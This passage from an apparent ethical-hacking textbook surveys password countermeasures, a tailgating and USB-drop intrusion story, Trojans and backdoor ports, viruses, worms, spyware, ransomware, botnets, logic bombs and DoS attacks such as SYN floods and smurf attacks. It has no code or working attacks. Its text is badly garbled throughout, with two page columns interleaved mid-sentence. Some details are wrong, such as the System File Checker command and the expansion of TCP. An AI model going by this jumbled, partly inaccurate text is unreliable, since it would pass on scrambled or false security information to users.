because you dont want your system to be vulnerable. Heres a quick list of
some countermeasures to take to prevent and remediate the attacks already Anti Spector (www.antispector.de) will detect Spector and delete it from
discussed. your system.
Password guessing and cracking countermeasures include the following:
Enforce 712 character alphanumeric, upper and lowercase passwords.
Real world scenario (Case-study)
Set the password change policy to 30 days.
Using Reconnaissance to gain Physical Access
Physically isolate and protect the server. Every weekday at 3 p.m. the Federal Express driver stops at the loading dock
Use the SYSKEY utility to store hashes on disk. of a building where the offices of Medical Associates, Inc. are located. When
the driver backs the truck up to the rear door of the building, he presses the
Monitor the server logs for brute force attacks on user accounts. buzzer and lets the security guard know he is at the door. Because the build-
ings security personnel recognize the driver as he comes to the door every
Block access to TCP and UDP ports 135 139. day around the same time for pickup and drop-off they remotely unlock the
Disable bindings to the Wins client on any adapter. door and allow the driver to enter. A hacker is watching this process from a
car in the parking lot and takes note of the procedure to gain physical entry
Log failed logon attempts in Event Viewer.
into the building. The next day, the hacker carries a large cardboard box to-
ward the door just as the Federal Express driver has been given entry to the
Chapter 5.
building. The driver naturally holds the door for the hacker because he is
carrying what appears to be a heavy, large box. They exchange pleasantries Malwares
and the hacker heads for the elevator up to Medical Associates offices. The
hacker leaves the box in the hallway of the building as he heads to his target
office. Once he reaches the front desk of the Medical Associates office, he asks Objectives
to speak with the office manager whose name he previously looked up on the Trojans and Backdoors
company website. The receptionist leaves her desk to go get the office man-
ager and the hacker reaches over the desk and plugs a USB drive containing Viruses and Worms
hacking tools into the back of her computer. Because the computer is not Spywares
locked with a password, he double-clicks on the USB drive icon and it silently Adware
installs the hacking software on the receptionists computer. He removes the
Ransom wares
USB drive and quickly exits the office suite and building undetected. This is
an example of how reconnaissance and understanding the pattern of peoples Bots
behaviour can enable a hacker to gain physical access to a target. Botnet
Bombs
Introduction
Trojans and backdoors are two ways a hacker can gain access to a target
system. They come in many different varieties, but they all have one thing in
common:
They must be installed by another program, or
The user must be tricked into installing the Trojan or backdoor on his/
her system.
Trojans and backdoors are potentially harmful tools in the ethical hackers
toolkit and should be used judiciously to test the security of a system or net-
work. While Trojans and backdoors are not easily detectable by themselves,
computers may appear to run slower due to heavy processor or network us-
age. Viruses and worms can be just as destructive to systems and networks
as Trojans and backdoors. In fact, many viruses carry Trojan executables
and can infect a system, then create a backdoor for hackers.
Apart from these, other types include spyware, adware, ransomware, Bots,
Botnets, and Logical Bombs etc. All of these types of malicious code or mal-
ware are important to ethical hackers because they are commonly used by
hackers to attack and compromise systems.
Trojans and Backdoors Many fake programs purporting to be legitimate software such as freeware,
spyware removal tools, system optimizers, screensavers, music, pictures,
Trojans and backdoors are types of malware used to infect and compromise
games, and videos can install a Trojan on a system just by being downloaded.
computer systems. A Trojan is a malicious program disguised as something
benign. Advertisements on Internet sites for free programs, music files, or video files
lure a victim into installing the Trojan program; the program then has sys-
In many cases the Trojan appears to perform a desirable function for the user
tem-level access on the target system, where it can be destructive and harm-
but actually allows a hacker access to the users computer system.
ful.
The term is derived from the Ancient Greek story of the wooden horse.
Common Trojan programs
---------------------------------------------------------------------------
Trojan Protocol Port
--------------------------------------------------------------
BackOrifice UDP 31337 or 31338
Deep Throat UDP 2140 and 3150
Whack-a-Mole TCP 12361 and 12362

NetBus 2 TCP 20034
GirlFriend TCP 21544
Trojans are often downloaded along with another program or software pack-
age. Once installed on a system, they can cause data theft and loss, as well as
Masters Paradise TCP 3129, 40421, 40422,
system crashes or slowdowns. Trojans can also be used as launching points
for other attacks, such as distributed denial of service (DDoS). Many Trojans 40423, and 40426
are used to manipulate files on the victim computer, manage processes, re-
motely run commands, intercept keystrokes, watch screen images, and restart --------------------------------------------------------------
or shut down infected hosts. Sophisticated Trojans can connect themselves
to their originator or announce the Trojan infection on an Internet Relay Chat A Backdoor is a program or a set of related programs that a hacker installs on
(IRC) channel. Trojans ride on the backs of other programs and are usually a target system to allow access to the system at a later time. A backdoor can
installed on a system without the users knowledge. be embedded in a malicious Trojan. The objective of installing a backdoor on
a system is to give hackers access into the system at a time of their choosing.
The key is that the hacker knows how to get into the backdoor undetected and
A Trojan can be sent to a victim system in many ways, such as the following: is able to use it to hack the system further and look for important information.
Adding a new service is the most common technique to disguise backdoors in
An instant messenger (IM) attachment the Windows operating system.
IRC
An email attachment
NetBIOS file sharing
A downloaded Internet program
Overt and Covert Channels
An overt channel is the normal and legitimate way that programs communi-
cate within a computer system or network. A covert channel uses programs
or communications paths in ways that were not intended.
Trojans can use covert channels to communicate. Some client Trojans use
covert channels to send instructions to the server component on the com-
promised system. This sometimes makes Trojan communication difficult to
decipher and understand. An unsuspecting intrusion detection system (IDS)
sniffing the transmission between the Trojan client and server would not flag
it as anything unusual. By using the covert channel, the Trojan can commu-
nicate or phone home undetected and the hacker can send commands to
the client component undetected.
Some covert channels rely on a technique called tunnelling, which lets one
Before the installation of a backdoor, a hacker must investigate the system protocol be carried over another protocol. Internet Control Message Protocol
to find services that are running. Again the use of good information-gather- (ICMP) tunnelling is a method of using ICMP echo-request and echo-reply to
ing techniques is critical to knowing what services or programs are already carry any payload an attacker may wish to use, in an attempt to stealthily
running on the target system. In most cases the hacker installs the backdoor, access or control a compromised system. The ping command is a generally
which adds a new service and gives it an inconspicuous name or, better yet, accepted troubleshooting tool, and it uses the ICMP protocol. For that reason,
chooses a service thats never used and that is either activated manually or many router, switches, firewalls, and other packet filtering devices allow the
completely disabled. ICMP protocol to be passed through the device. Therefore, ICMP is an excel-
lent choice of tunnelling protocols.
This technique is effective because when a hacking attempt occurs the system
administrator usually focuses on looking for something odd in the system,
leaving all existing services unchecked. The backdoor technique is simple but Types of Trojans
efficient: the hacker can get back into the machine with the least amount of
visibility in the server logs. The backdoored service lets the hacker use higher Trojans can be created and used to perform different attacks. Here are some
privileges in most cases, as a System account. of the most common types of Trojans:
Remote Access Trojans (RATs) are a class of backdoors used to enable re- Remote Access Trojans (RATs) Used to gain remote access to a sys-
mote control over a compromised machine. They provide apparently useful tem.
functions to the user and, at the same time, open a network port on the
Data-Sending Trojans Used to find data on a system and deliver data
victim computer. Once the RAT is started, it behaves as an executable file,
to a hacker.
interacting with certain Registry keys responsible for starting processes and
sometimes creating its own system services. Unlike common backdoors, RATs Destructive Trojans Used to delete or corrupt files on a system.
hook themselves into the victim operating system and always come packaged
with two files: the client file and the server file. The server is installed in the Denial-of-Service Trojans Used to launch a denial-of-service attack.
infected machine, and the client is used by the intruder to control the com- Proxy Trojans Used to tunnel traffic or launch hacking attacks via oth-
promised system. RATs allow a hacker to take control of the target system at er systems.
any time. In fact one of the indications that a system has been exploited is
unusual behaviour on the system, such as the mouse is moving on its own or FTP Trojans Used to create an FTP server in order to copy files onto a
pop-up windows appearing on an idle system. system.
Security Software Disabler Trojans Used to stop antivirus software.
Trojan and Backdoor Countermeasures itself. The virus code is injected into the previously benign program and is
spread when the program is run. Examples of virus carrier programs are
Most commercial antivirus programs have anti-Trojan capabilities as well as
macros, games, email attachments, Visual Basic scripts, and animations. A
spyware detection and removal functionality. These tools can automatically
worm is similar to a virus in many ways but does not need a carrier program.
scan hard drives on start up to detect Backdoor and Trojan programs before
A worm can self-replicate and move from infected host to another host. A
they can cause damage. Once a system is infected, its more difficult to clean,
worm spreads from system to system automatically, but a virus needs anoth-
but you can do so with commercially available tools.
er program in order to spread. Viruses and worms both execute without the
Example: Norton Internet Security includes a personal firewall, intrusion knowledge or desire of the end user.
detection system, antivirus, antispyware, antiphishing and email scanning.
Norton Internet Security will clean most Trojans from a system as well.
The Virus Lifecycle
The security software works by having known signatures of malware, such as
Trojans and viruses. The repair for the malware is made through the use of There are two main phases in the lifecycle of a virus:
definitions of the malware.
When installing and using any personal security software or antivirus and an-
Replication and Activation
ti-Trojan software, you must make sure that the software has all the current
definitions. To ensure the latest patches and fixes are available, you should In the first phase, replication, viruses typically remain hidden and do not in-
connect the system to the Internet so the software can continually update the terfere with normal system functions. During this time, viruses actively seek
malware definitions and fixes. Its important to use commercial applications out new hosts to infect by attaching themselves to other software programs or
to clean a system instead of freeware tools, because many freeware removal by infiltrating the OS.
tools can further infect the system.
During the second phase, activation, the gradual or sudden destruction of the
In addition, a lot of commercial security software includes an intrusion detec- system occurs. Typically, the decision to activate is based on a mathematical
tion component that will perform port monitoring and can identify ports that formula with criteria such as date, time, number of infected files or others.
have been opened or files that have changed. The possible damage at this stage could include destroyed data, software or
hardware conflicts, space consumption and abnormal behaviour.
The key to preventing Trojans and backdoors from being installed on a sys-
tem is to educate users not to install applications downloaded from the In-
ternet or open email attachments from parties they dont know. Many system
administrators dont give users the system permissions necessary to install Types of Viruses
programs on their system for that very reason. Proper use of Internet tech- Viruses are classified according to two factors: what they infect and how
nologies should be included in regular employee security awareness training. they infect.
System File Checker is another command line based tool used to check wheth- A virus can infect the following components of a system:
er a Trojan program has replaced files. If System File Checker detects that a
file has been overwritten, it retrieves a known good file from the Windows\ System sectors
system32\dllcache folder and overwrites the unverified file. Files
The command to run the System File Checker is sfc/scan now. Macros (such as Microsoft Word macros)
Companion files (supporting system files like DLL and INI files)
Disk clusters
Viruses and Worms
Batch files (BAT files)
Viruses and worms can be used to infect a system and modify a system to Source code
allow a hacker to gain access. Many viruses and worms carry Trojans and
backdoors. In this way, a virus or worm is a carrier and allows malicious code
such as Trojans and backdoors to be transferred from system to system much
in the way that contact between people allows germs to spread. A virus and a
worm are similar in that theyre both forms of malicious software (malware).
A virus infects another executable and uses this carrier program to spread

A virus infects through interaction with an outside system. Viruses need to An attacker can write a custom script or virus that wont be detected by an-
be carried by another executable program. By attaching itself to the benign tivirus programs. Because virus detection and removal is based on a signa-
executable a virus can spread fairly quickly as users or the system runs the ture of the program, a hacker just needs to change the signature or look of
executable. Viruses are categorized according to their infection technique, as the virus to prevent detection. The virus signature or definition is the way an
follows: antivirus program is able to determine if a system is infected by a virus. Until
the virus is detected and antivirus companies have a chance to update virus
Polymorphic Viruses These viruses encrypt the code in a different way with
definitions, the virus goes undetected.
each infection and can change to different forms to try to evade detection.
One of the most longstanding viruses was the Melissa virus, which spread
through Microsoft Word Macros. Melissa infected many users by attaching to
Stealth Viruses This is a complex malware that hides itself after infecting a the Word doc and then when the file was copied or emailed, the virus spread
computer. Once hidden, it copies information from uninfected data onto itself along with the file.
and relays this to antivirus software during a scan. This makes it a difficult
type of virusto detect and delete. Additional time may elapse before a user updates the antivirus program, al-
lowing the system to be vulnerable to an infection. This allows an attacker to
evade antivirus detection and removal for a period of time.
Fast and Slow Infectors These viruses can evade detection by infecting very
quickly or very slowly. This can sometimes allow the program to infect a sys- A critical countermeasure to virus infection is to maintain up-to-date virus
tem without detection by an antivirus program. definitions in an antivirus program.
Virus Hoaxes are emails sent to users usually with a warning about a virus
Sparse Infectors These viruses infect only a few systems or applications. attack. The Virus Hoax emails usually make claims about the damage that
will be caused by a virus and then offer to download a remediation patch from
well-known companies such as Microsoft or Norton. Other Hoaxes recom-
Armored Viruses These viruses are encrypted to prevent detection. mend users delete certain critical systems files in order to remove the virus.
Of course, should a user follow these recommendations they will most cer-
tainly have negative consequences.
Multipartite Viruses These advanced viruses create multiple infections.
Cavity (Space-Filler) Viruses These viruses attach to empty areas of files.
Virus Detection Methods
Tunneling Viruses These viruses are sent via a different protocol or encrypt- The following techniques are used to detect viruses:
ed to prevent detection or allow it to pass through a firewall.
Scanning
Integrity checking with checksums
Camouflage Viruses These viruses appear to be another program.
Interception based on a virus signature
The process of virus detection and removal is as follows:
NTFS and Active Directory Viruses These viruses specifically attack the
NT file system or Active Directory on Windows systems. 1. Detect the attack as a virus. Not all anomalous behaviour can be attributed
to a virus.
Macro viruses Modern office software can be controlled by small programs 2. Trace processes using utilities such as handle.exe, listdlls.exe, fport.exe,
known as scripts or macros, which are embedded in the files the applications netstat.exe, pslist.exe and map commonalities between affected systems.
use. Macro viruses are spread through these small scripts.
3. Detect the virus payload by looking for altered, replaced or deleted files.
New files, changed file attributes or shared library files should be checked.
File viruses A file virus is a virus that attaches itself to a program. File vi- 4. Acquire the infection vector and isolate it. Then, update your antivirus defi-
ruses do not infect other types of file, such as documents. When the infected nitions and rescan all systems.
program file is run, the virus part lodges itself in the computers memory and
subsequently may infect all programs run afterwards. Worms can be prevented from infecting systems in much the same way as
viruses. Worms can be more difficult to stop because they spread on their

own, meaning they do not need user intervention to install; they continue to ILOVEYOU (also known as VBS/Loveletter or Love Bug Worm)
propagate the malware. Worms can be detected with the use of anti-malware
software that contains definitions for worms. Worms, most importantly, need You may have gotten an email in 2000 with the subject line ILOVEYOU. If
to be stopped from spreading. In order to do this, an administrator may need you deleted it, you were safe from one of the most costly worms in computer
to take systems off line. The best practice for cleaning worms off networked history. The attachment in that email, a file called LOVE-LETTER-FOR-YOU.
systems is to first remove the computer from the network and then run the TXT.vbs, started a worm that spread like wildfire by accessing email address-
security software to clean the worm. es found in users Outlook contact lists. Unsuspecting recipients, believing
the email to be benign, would execute the document only to have most of their
A worm is more dangerous than a virus because a worm is self-propagat- files overwritten. The net result was an estimated $5.5 billion to $8.7 billion in
ing. In its simplest form, a worm program does nothing more than copy and damages. Ten percent of all Internet-connected computers were hit.
spread itself, but that act alone can often clog network bandwidth and slow
down or crash computers, as in the case of the 1988 Morris Internet worm,
which reportedly infected around 6,000 computers. The real danger occurs Email worms
when the worm delivers a malicious payload as it spreads, such as one that
drops a RAT on an infected computer (so that a hacker can spy on it later) or To spread by email, a worm will search for the address book of an email ap-
wipes out crucial files. Worms commonly spread through always-on Inter- plication such as Microsoft Outlook or Outlook Express. Once the worm finds
net connections, such as cable or DSL modems (used by individuals), or T1 the address book, it emails copies of itself to some or all of the stored address-
and T3 lines (used by businesses). Its possible to spread a worm through a es along with a deceptive subject line such as I Love You (used by the Love
dial-up connection, but dial-up connections are slow, which also limits the Letter worm in 2000) or Merry Christmas (used by the Zafi worm in 2004).
speed that a worm can spread. Unlike spam, which comes from an unknown source, a worms email comes
from someone the recipient most likely knows (otherwise the email address
Three common ways that worms spread are through email, Internet Relay wouldnt have been stored in the persons address book in the first place).
Chat (IRC) channels or instant messaging services and Internet ports. Some People are apt to trust email from a familiar source and open the message and
worms spread themselves exclusively through one method, while others use a its attachments, not suspecting that it includes the worm.
combination of methods to ensure they spread as quickly as possible.
To further entice users to run the malicious attachment, the worm may falsely
describe its content as a graphics file, as an electronic greeting card, or as a
seemingly harmless text file (a technique used by the MyDoom worm). When
Some famous worms
the victim opens the attachment, the worm copies email addresses from the
Michelangelo new victims address book and starts emailing itself to a new batch of people
all over again.
In 1991, thousands of machines running MS-DOS were hit by a new worm,
one which was scheduled to be activated on the artist Michelangelos birthday
(March 6th). On that day, the virus would overwrite the hard disk or change Spyware
the master boot record of infected hosts.
Spyware is a software that sends personal information about you over the inter-
Code Red net without your permission or knowledge. There are two ways in which spyware
Friday the 13th was a bad day in July of 2001; it was the day Code Red was operates: one is as part of the browser and the other is as a standalone piece
released. The worm took advantage of buffer overflow vulnerability in Micro- of software that you may have downloaded or picked up some other way. Your
soft IIS servers and would self-replicate by exploiting the same vulnerability browser can give out a lot of information about you. Standalone spyware can be
in other Microsoft IIS machines. Web servers infected by the Code Red worm even worse, monitoring your PC activities more widely and reporting back what
would display the following message: it finds, such as passwords you have typed. Key loggers can be used as spyware.
HELLO! Welcome to http://www.worm.com! Hacked By Chinese! Spyware programs also sometimes spy on a broader scope of information than
standard adware. They may even log your every keystroke, allowing them to
After 20 to 27 days, infected machines would attempt to launch a denial of ser- capture usernames, passwords, account numbers, credit card numbers and
vice on many IP addresses, including the IP address of www.whitehouse.gov. every word you type in your e-mail program, among other things. This obvi-
ously crosses the line from simply monitoring your activity for demographic
Code Red and its successor, Code Red II, are known as two of the most expen- reasons to carrying out pure spying with malicious intent. Still, the majority of
sive worms in Internet history, with damages estimated at $2 billion and at a spyware consists of Web bugs and tracking cookies designed to track and mon-
rate of $200 million in damages per day. itor your activity just like adware, except without your knowledge or consent.

browser. Unfortunately, some applications that contain adware track your
Internet surfing habits in order to serve ads related to you. When the adware
Products like Spector Pro from Spectorsoft silently sit in the background and
becomes intrusive like this, then we move it into the spyware category and it
monitor and record all Web activity, all incoming and outgoing e-mail messages,
then becomes something you should avoid for privacy and security reasons.
all instant-message chat sessions, capture every keystroke typed and monitor
every program used and every file exchanged on peer-to-peer (P2P) networks. In Ransomware
fact, Spector Pro can also be configured to record an actual snapshot image of
the screen at set intervals so the contents of the screen can be reviewed as well, Ransomwareis a type ofmalwarethat restricts access to a computer system
in case all of the other monitoring and tracking missed something. that it infects in some way, and demands that the user pay aransomto the
operators of the malware to remove the restriction.
Some forms of ransomware systematicallyencrypt fileson the systems hard
Home page hijackers drive using a largekeythat may be technologically infeasible to breach without
Your browsers home page can be redirected to a specific website by malware. paying the ransom, while some may simply lock the system anddisplay mes-
Home page hijackers are often used to direct home pages to pornographic sagesintended to coax the user into paying. Ransomware typically propagates
websites and can make sure that even if you reset the home page, they hijack as atrojan, whose payload is disguised as a seemingly legitimate file.
it again when the PC starts up. If you get this problem the first step is to at- While initially popular inRussia, the use of ransomware scams has now grown
tempt to revert to the previous home page. If this doesnt work, you may need internationally.
to search for and install a specific utility to eliminate the problem.
Adware
Adware or advertising-supported software, is any software package that auto-

matically renders advertisements in order to generate revenue for its author.
The advertisements may be in the user interface of the software or on a screen
presented to the user during the installation process.
Adware is considered a legitimate alternative offered to consumers who do not
wish to pay for software. There are many ad-supported programs, games or
utilities that are distributed as adware (or freeware). Today we have a growing
number of software developers who offer their goods as sponsored freeware
(adware) until you pay to register. If youre using legitimate adware, when you
stop running the software, the ads should disappear and you always have the
option of disabling the ads by purchasing a registration key.
Another use of the phrase adware is to describe a form ofspywarethat col-
lects information about the user in order to display advertisements in theWeb

Bots and Botnets
A bot, short for robot, is a type of software application or script that performs
tasks on command like indexing a search engine and they are really good at
performing repetitive tasks. Search engines use them to surf the web and me-
thodically catalogue information from websites, trading sites make them look
for the best bargains in seconds and some websites and services employ them
to deliver important information like weather conditions, news and sports,
currency exchange rates.
Unfortunately, not all bots roaming the internet are useful and harmless. Cy-
ber crooks have also noticed their potential and have come up with malicious
bots programs designed to secretly install themselves on unprotected or vul-
nerable computers and carry out whatever actions they demand. And that
could be anything from sending spam to participating in a distributed denial These computer owners unwittingly put everyone at risk, and most would be
of service attack (DDoS) that brings down entire websites. shocked to learn that the spam youre receiving is coming from thousands or
even millions of computers just like (and including) theirs. The real owners of
Bad bots perform malicious tasks allowing an attacker to take complete con- those computers can still use them, and they are probably unaware of any-
trol over an affected computer for the criminal to control remotely. Once in- thing being wrong except perhaps they think their computer seems slow at
fected, these machines may also be referred to as zombies. times.
Such networks comprising hundreds or thousands of infected devices have It only takes minutes for an unprotected, internet connected computer to be
the resources needed to perform high-scale malicious actions such as: infected with malicious software and turned into a bot, underscoring the crit-
ical need for every computer and smartphone user to have up-to-date security
software on all their devices.
Mass-spam delivery that floods millions of inboxes in a matter of seconds
Dont let your computer become a bot
DoS and DDoS attacksthat crash entire websites and can put legitimate
businesses in serious trouble If you have not installed security software and ensured that it is turned on
Brute-force hacking attacks by cracking passwords and other internet se- and kept up-to-date, your machine is likely infected with all kinds of malicious
curity measures software, including bots. The best protection is to set your anti-virus and an-
ti-spyware programs to automatically update, and to install every patch that
Identity theft and internet fraud by collecting private information from in-
fected users your operating system and browser make available.
Even the most up-to-date protection tools cannot protect you from everything;
there is still some risk because the developers of malware are always looking
for new ways to get around security measures and there is the risk of infection
because of actions you or another person who used the computer, take.
A common user risk comes through downloading content from unknown sites
OR from friends who dont have up-to-date protection. The intent may not be
malicious at all, but if content comes from an unprotected computer, it may
well be infected. By downloading the content you bring the malicious code
past your security checkpoints where they can try to clean the malware off
your machine, but they have no way of defending against it being downloaded
in the first place. Always use extreme caution when downloading information
or files from someone whose computer is not protected.

Bombs
Logic and time bombs
Bombs usually refer to malware with a distinctly damaging intent. Logic

bombs cause the damage when they are set off by some specific happening or
logical event. Real World Scenario (Case Study): Using a Covert Channel
Logical Bombs are Viruses that are triggered when certain logical conditions Jeremiah Denton, a prisoner of war during the Vietnam War, used a covert
are met i.e. opening a file, booting your computer or accessing certain pro- channel to communicate without his captors knowledge. Denton was inter-
grams. viewed by a Japanese TV reporter, and eventually a videotape of the interview
made its way to the United States. As American intelligence agents viewed the
Time bombs will go off on a particular date or at a particular time and will
tape, one of them noticed Denton was blinking in an unusual manner. They
otherwise lie dormant. Often, time bombs are set to go off at some sort of an-
discovered he was blinking letters in Morse code. The letters were T-O-R-T-U-
niversary, for example the Chernobyl virus that is activated each year on 26
R-E, and Denton was blinking them over and over. This is a real-world exam-
April, the date of the Chernobyl nuclear disaster.
ple of how a covert channel can be used to send a communication message
Some viruses attack their host systems on specific dates, such as Friday the undetected.
13th or April Fools Day. Trojans that activate on certain dates are often called
Another example of using a computer to convey information via a covert chan-
time bombs.
nel is the use a characteristic of a file to deliver information rather that the
file itself. A computer based example of a covert channel is in the creation of
a seemingly innocent computer file 16 bytes in size. The file can contain any
Countermeasures data as that is not the important information. The file can then be emailed to
The keys to stopping malwares are to prevent their initial access to your com- another person. Again, it seems innocent enough but the real communication
puter (by using a firewall to block the ports that they use). is of the number 16. The file size is the important data, not the contents of
the file.
To detect and remove any existing Trojan horses and worms (using antivirus
and Trojan horse cleaning programs)
To stop using the programs most commonly exploited to spread them. Your
computer can still become a target of Trojan horses, viruses and worms no
matter what defences you install, but at least there will be less of a chance
that your computer will suffer any damage or contribute to the proliferation
of these threats.

WHY PEOPLE WRITE VIRUSES Chapter 6.
Viruses are just computer programs that someone has taken the time to write
and test, so people might wonder why would anyone do something destructive
Various Attack Methods &
and harmful to someone they dont know and will likely never see? Basically, their Countermeasures - I
some people write viruses for the same reasons that other people spray graffiti
on buildings, smash car windows, or throw rocks from overpasses. The rea-
son why people do any of these things is because they can and because they
can often get away with doing it.
DoS ATTACK
For fun: Many people write computer viruses just to see if they can do it. Vi- Objective
rus writing requires detailed knowledge of a specific operating system, so for Introduction of DoS
many programmers, writing a virus was a way to test and prove their knowl-
Types of DoS Attacks
edge. Many of these early viruses were designed more as proof of concept than
as deliberate attempts to sabotage other peoples computers. Reflecting their Working process of DDoS Attacks
creators spirit of curiosity and lack of malice, these early viruses often did BOTs/BOTNETs Working
nothing more than play a constant beep through the computers speaker or Forms of denial of service
reprogram the keyboard to generate a question mark or other symbol every
Tools for Dos Attack
time the E key was pressed. Annoying, to be sure, but ultimately harmless.
Some viruses even got playful and displayed a graphic image on the screen, Countermeasures
such as an ambulance or a man strolling across the bottom of the screen. One
playful virus would randomly display the message, I want a cookie, on the
screen. The only way to make the message go away was to type cookie. Other Introduction DoS
viruses displayed political or humorous messages. A DoS (Denial of Service) attack is an attempt by a hacker to flood a users
or an organizations system and to make a computer resource unavailable to
its intended users. During a Denial of Service (DoS) attack, a hacker renders
For notoriety: Although people write and release viruses every day, the large a system unusable or significantly slows the system by overloading resources
majority of viruses fail to spread due to poor programming. Many virus writers or preventing legitimate users from accessing the system. These attacks can
want the notoriety of creating viruses that spread faster and cause the great- be perpetrated against an individual system or an entire network.
est amount of damage possible. If a virus writer could panic an entire nation
and get his virus reported by name in USA Today or on CNN, his reputation In a denial-of-service (DoS) attack, an attacker attempts to prevent legiti-
would soar in the underground virus community. So malicious virus writ- mate users from accessing information or services. By targeting your com-
ers developed ever trickier tactics for slipping past antivirus programs and puter and its network connection or the computers and network of the sites
spreading as quickly as possible. Their ultimate goal is to create a virus that you are trying to use, an attacker may be able to prevent you from accessing
would become a household name, like the Michelangelo, Melissa, Chernobyl, email, websites, online accounts (banking, etc.), or other services that rely on
and I Love You viruses. Although these virus writers could never publicly the affected computer.
bask in the notoriety of their creations, they could still gain some measure of
fame among their underground hacker friends. The most common and obvious type of DoS attack occurs when an attacker
floods a network with information. When you type a URL for a particular
website into your browser, you are sending a request to that sites computer
server to view the page. The server can only process a certain number of re-
quests at once, so if an attacker overloads the server with requests, it cant
process your request. This is a denial of service because you cant access
that site.

An attacker can use spam email messages to launch a similar attack on your TYPES OF DoS ATTACKS
email account. Whether you have an email account supplied by your employ-
There are two main categories of DoS attacks. DoS attacks can be either sent
er or one available through a free service such as Yahoo or Hotmail, you are
by a single system to a single target (simple DoS) or sent by many systems to
assigned a specific quota, which limits the amount of data you can have in
a single target (DDoS). The goal of DoS isnt to gain unauthorized access to
your account at any given time. By sending many, or large, email messages
machines or data, but to prevent legitimate users of a service from using it.
to the account, an attacker can consume your quota, preventing you from
receiving legitimate messages.
Although a DoS attack does not usually result in the theft of information i. DoS attack: Simple denial-of-service attack where single system to
or other security loss, it can cost the target person or company a great a single target is involved
deal of time and money. Typically, the loss of service is the inability of a par-
ticular network service, such as e-mail, to be available or the temporary loss
of all network connectivity and services. A denial of service attack can also ii. DDoS attacks: DDoS (Distributed denial-of-service) attacks can be
destroy programming and files in affected computer systems. In some cases, perpetrated by BOTs and BOTNETS, which are compromised sys-
DoS attacks have forced Web sites accessed by millions of people to tempo- tems that an attacker uses to launch the attack against the end
rarily cease operation. victim. The system or network that has been compromised is a sec-
ondary victim, whereas the DoS and DDoS attacks flood the primary
Attacks can be directed at any network device, including attacks on routing victim or target.
devices and web, electronic mail or Domain Name System servers.
A DoS attack can be perpetrated in a number of ways. The five basic types
of attack are: HOW DDoS ATTACKS WORK
1. Consumption of computational resources, such as bandwidth, disk DDoS is an advanced version of the DoS attack. Like DoS, DDoS also tries to
space or processor time deny access to services running on a system by sending packets to the des-
tination system in a way that the destination system cant handle. The key
2. Disruption of configuration information, such as routing information. of a DDoS attack is that it relays attacks from many different hosts (which
must first be compromised), rather than from a single host like DoS. DDoS is
3. Disruption of state information, such as unsolicited resetting of TCP a large-scale, coordinated attack on a victim system.
sessions.
The services under attack are those of the primary victim; the compromised
4. Disruption of physical network components. systems used to launch the attack are secondary victims. These compromised
5. Obstructing the communication media between the intended users and systems, which send the DDoS to the primary victim, are sometimes called
the victim so that they can no longer communicate adequately. zombies or BOTs. Theyre usually compromised through another attack and
then used to launch an attack on the primary victim at a certain time or un-
A DoS attack may include execution of malware intended to: der certain conditions. It can be difficult to track the source of the attacks
because they originate from several IP addresses.
Max out the processors usage, preventing any work from occurring.
Normally, DDoS consists of three parts:
Trigger errors in the microcode of the machine.
Master/Handler
Trigger errors in the sequencing of instructions, so as to force the com- Slave/secondary victim/zombie/agent/BOT/BOTNET
puter into an unstable state or lock-up.
Victim /primary victim
Exploit errors in the operating system, causing resource starvation
and/or thrashing, i.e. to use up all available facilities so no real work
can be accomplished.
Crash the operating system itself.

Figure: Dos Attack
The master is the attack launcher. A slave is a host that is compromised by

and controlled by the master. The victim is the target system. The master di-
rects the slaves to launch the attack on the victim system. Figure: BOTNETs
DDoS is done in two phases. In the intrusion phase, the hacker compromises
weak systems in different networks around the world and installs DDoS tools
on those compromised slave systems. In the DDoS attack phase, the slave A BOTNET is a group of BOT systems. BOTNETs serve various purposes,
systems are triggered to cause them to attack the primary victim. including DDoS attacks, creation or misuse of Simple Mail Transfer Protocol
(SMTP) mail relays for spam, Internet Marketing fraud, the theft of applica-
tion serial numbers, login IDs and financial information such as credit card
HOW BOTS/BOTNETS WORK numbers.
One of the most common and efficient DDoS attack methods are based on us- Generally, a BOTNET refers to a group of compromised systems running a
ing hundreds of zombie hosts. Zombies are usually controlled and managed BOT for the purpose of launching a coordinated DDOS attack.
via IRC networks, using so-called botnets.
A BOT is short for web robot and is an automated software program that COMMON FORMS OF DENIAL OF SERVICE ATTACKS
behaves intelligently. Spammers often use BOTs to automate the posting of
spam messages on newsgroups or the sending of emails. BOTs can also be
used as remote attack tools. Most often, BOTs are web software agents that I. Buffer Overflow Attacks
interface with web pages. For example, web crawler (spiders) are web robots
that gather web-page information. The most dangerous BOTs are those that The most common kind of DoS attack is simply to send more traffic to a net-
covertly install themselves on users computers for malicious purposes. work address than the programmers who planned its data buffers anticipated
someone might send. The attacker may be aware that the target system has
Some BOTs communicate with other users of Internet-based services via in- a weakness that can be exploited or the attacker may simply try the attack
stant messaging, Internet Relay Chat (IRC) or another web interface. These in case it might work. A few of the better-known attacks based on the buffer
BOTs allow IRQ users to ask questions in plain English and then formulate a characteristics of a program or system include:
proper response. Such BOTs can often handle many tasks, including report-
ing weather, providing zip-code information, listing sports scores, converting Sending e-mail messages that have attachments with 256-character file
units of measure, such as currency, and so on. names to Netscape and Microsoft mail programs

Sending oversized Internet Control Message Protocol (ICMP) packets iii. SYN FLOODING
(this is also known as the Packet Internet or Inter-Network Groper
(PING) of death)
Sending to a user of the Pine e-mail program a message with a From
address larger than 256 characters.
II. SMURF ATTACK

A smurf attack sends a large amount of ICMP echo (ping) traffic to a broad-
cast IP address with the spoofed source address of a victim. Each secondary
victims host on that IP network replies to the ICMP echo request with an echo
reply, multiplying the traffic by the number of hosts responding. On a multi
access broadcast network, hundreds of machines might reply to each packet.
This creates a magnified DoS attack of ping replies, flooding the primary vic-
tim. IRC servers are the primary victim of smurf attacks on the Internet.
A SYN flood attack sends TCP connection requests faster than a machine can
process them. The attacker creates a random source address for each pack-
et and sets the SYN flag to request a new connection to the server from the
spoofed IP address. The victim responds to the spoofed IP address and then
waits for the TCP confirmation that never arrives. Consequently, the victims
connection table fills up waiting for replies; after the table is full, all new con-
nections are ignored. Legitimate users are ignored, as well, and cant access
the server. Some of the methods to prevent SYN Flood attacks are SYN cook-
ies, RST cookies, Micro Blocks, and Stack Tweaking.
When a session is initiated between the Transport Control Program (TCP)
client and server in a network, a very small buffer space exists to handle the
usually rapid hand-shaking exchange of messages that sets up the session.
The session-establishing packets include a SYN field that identifies the se-
quence in the message exchange. An attacker can send a number of connec-
In this attack, the perpetrator sends an IP ping (or echo my message back to
tion requests very rapidly and then fail to respond to the reply. This leaves the
me) request to a receiving site The ping packet specifies that it be broadcast
